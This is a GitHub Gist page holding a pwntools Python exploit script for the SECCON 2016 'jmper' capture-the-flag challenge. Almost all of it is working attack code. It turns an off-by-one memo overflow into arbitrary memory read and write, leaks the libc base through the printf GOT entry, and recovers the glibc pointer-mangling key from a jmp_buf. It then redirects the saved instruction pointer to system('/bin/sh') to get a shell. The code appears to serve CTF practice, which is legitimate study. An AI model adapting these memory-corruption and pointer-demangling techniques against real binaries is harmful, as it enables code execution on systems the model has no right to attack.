Created
December 23, 2016 08:12
-
-
Save orisano/a4128a83351641ad7a18348df9b0c3e6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.arch = "amd64" | |
| elf = ELF("./jmper") | |
| if args["REMOTE"]: | |
| HOST = "jmper.pwn.seccon.jp" | |
| PORT = 5656 | |
| libc = ELF("./libc-2.19.so") | |
| else: | |
| HOST = "localhost" | |
| PORT = 4000 | |
| libc = elf.libc | |
| r = remote(HOST, PORT) | |
| def addr_pad(addr): | |
| return u64((addr + "\x00" * 8)[:8]) | |
| def add_student(): | |
| _ = r.recvuntil(":)\n") | |
| r.writeline("1") | |
| def write_name(idx, name): | |
| _ = r.recvuntil(":)\n") | |
| r.writeline("2") | |
| _ = r.recvuntil("ID:") | |
| r.writeline(str(idx)) | |
| _ = r.recvuntil("Input name:") | |
| r.writeline(name) | |
| def write_memo(idx, memo): | |
| _ = r.recvuntil(":)\n") | |
| r.writeline("3") | |
| _ = r.recvuntil("ID:") | |
| r.writeline(str(idx)) | |
| _ = r.recvuntil("Input memo:") | |
| r.writeline(memo) | |
| def show_name(idx): | |
| _ = r.recvuntil(":)\n") | |
| r.writeline("4") | |
| _ = r.recvuntil("ID:") | |
| r.writeline(str(idx)) | |
| name = r.recvuntil("1.")[:-2] | |
| return name | |
| def show_memo(idx): | |
| _ = r.recv(":)\n") | |
| r.writeline("5") | |
| _ = r.recvuntil("ID:") | |
| r.writeline(str(idx)) | |
| memo = r.recvuntil("1.")[:-2] | |
| return memo | |
| def leak_name_addr(idx): | |
| write_memo(idx, "A" * 32) | |
| raw_addr = show_memo(idx)[32:] | |
| return addr_pad(raw_addr) | |
| def patch_lowest_byte(idx, byte): | |
| write_memo(idx, "A" * 32 + chr(byte)) | |
| def read(addr): | |
| write_name(0, p64(addr)) | |
| return show_name(1) | |
| def read_addr(addr): | |
| return u64(read(addr).ljust(8, "\x00")) | |
| def write(addr, value): | |
| write_name(0, p64(addr)) | |
| write_name(1, value) | |
| def mangle_ptr(p, k): | |
| return rol(p ^ k, 17) | |
| def demangle_ptr(p, k): | |
| return ror(p, 17) ^ k | |
| rip_offset = 0x38 | |
| add_student() | |
| add_student() | |
| patch_lowest_byte(0, 0x78) | |
| printf_addr = read_addr(elf.got["printf"]) | |
| libc_base = printf_addr - libc.symbols["printf"] | |
| system_addr = libc_base + libc.symbols["system"] | |
| log.info("libc leak: %x" % libc_base) | |
| jmpbuf_addr = read_addr(elf.symbols["jmpbuf"]) | |
| log.info("heap? %x" % jmpbuf_addr) | |
| mangled_rip = read_addr(jmpbuf_addr + rip_offset) | |
| orig_rip = 0x400c31 | |
| xor_key = demangle_ptr(mangled_rip, orig_rip) | |
| write(jmpbuf_addr + rip_offset, p64(mangle_ptr(system_addr, xor_key))) | |
| write(jmpbuf_addr, "/bin/sh\x00") | |
| log.info("RIP: %x, RDI: %x" % (system_addr, jmpbuf_addr)) | |
| for i in range(29): | |
| add_student() | |
| _ = r.recv() | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment